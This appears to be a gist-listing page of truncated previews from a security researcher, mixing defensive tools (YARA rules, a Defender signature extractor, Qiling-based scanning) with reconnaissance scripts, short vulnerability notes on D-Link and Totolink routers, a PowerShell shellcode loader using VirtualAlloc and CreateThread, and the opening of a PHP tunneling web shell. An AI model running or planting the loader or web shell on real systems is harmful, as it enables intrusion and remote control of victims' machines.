| import "elf" | |
| import "console" | |
| /* | |
| To use this rule, simply run: yara <path to this rule> <pah to dir to scan> -r -p 1 -N | |
| Explain: | |
| -r: recursively search | |
| -p 1: Run single thread only. Show console log won't be messed up | |
| -N: No follow symlink. Ignore duplicate results from symlink | |
| Suggestion: In future, run with -s could be good |
| #!/usr/bin/python3 | |
| import os | |
| import requests | |
| from shodan import Shodan | |
| API_KEY_PATH = os.path.expanduser("~/.config/shodan/api_key") # read API key from config file | |
| KEYWORD = "country:cn http.status:200 \"Server: Check Point SVN foundation\"" | |
| URL_REQ = "/clients/MyCRL" |
Dlink DIR-600M C1 has buffer overflow in authentication that allows unauthenticated attacker to performce Denial of Service attack. Attacker can send payload to web login or telnet login (which is disabled by default). This vulnerability is as same as
CVE-2021-26709 which possibly leads to unauthenticated remote code execution.
| #!/bin/bash | |
| # Example of using bash with array | |
| port_arr=(80 22 3306) | |
| max_timeout=2 # Timeout requires coreutils (on Debian-based system) | |
| function do_scan_port { | |
| # If use array like above, use the line above | |
| for port in "${port_arr[@]}"; do | |
| # Otherwise, use the port range |
| import .. / src / engine / libyara # Binding lib co san. Neu tai ve thi sua cho nay, lay binding o day https://github.com/dmknght/nimyara | |
| import strformat | |
| import os | |
| # Pass vao compiler de link voi thu vien Yara | |
| {.passL: "-lyara".} | |
| type | |
| COMPILER_RESULT = object | |
| errors: int | |
| warnings: int |
| /* | |
| Forked from https://github.com/hongson11698/defender-database-extract/ | |
| - Fixed some buffer overflow in sprintf | |
| - Compile: g++ extract_sig.cpp -o extract_sig -Wall -lstdc++fs | |
| - Usage: ./extract_sig <dir to write result> <extracted av/as base> <optional: extracted av/as dlta> | |
| If both av and dlta is defined, the program will merge both of them to make a final db | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> |
| from qiling import * | |
| from qiling.const import * | |
| from unicorn.x86_const import UC_X86_INS_SYSCALL # https://github.com/unicorn-engine/unicorn/blob/master/bindings/python/unicorn/x86_const.py | |
| import argparse | |
| import yara | |
| def mem_scan(ql: Qiling, address: int, size: int, yr_pointer) -> None: | |
| buf = ql.mem.read(address, size) | |
| for insn in ql.arch.disassembler.disasm(buf, address): |
Validity_check.Totolink is using function Validity_check to fix OS command injection vulnerability. An attacker can bypass this filter using character %, exploit the format string at snprintf function to execute OS system commands.
| $rzJEzfsIm = @" | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
| "@ | |
| $ozmjNQUHYWcWLEB = Add-Type -memberDefinition $rzJEzfsIm -Name "Win32" -namespace Win32Functions -passthru | |
| [Byte[]] $bwHCjeufl = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0 |
| <?php | |
| ini_set("allow_url_fopen", true); | |
| ini_set("allow_url_include", true); | |
| ini_set('always_populate_raw_post_data', -1); | |
| error_reporting(E_ERROR | E_PARSE); | |
| if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200); | |
| function blv_decode($data) { | |
| $data_len = strlen($data); |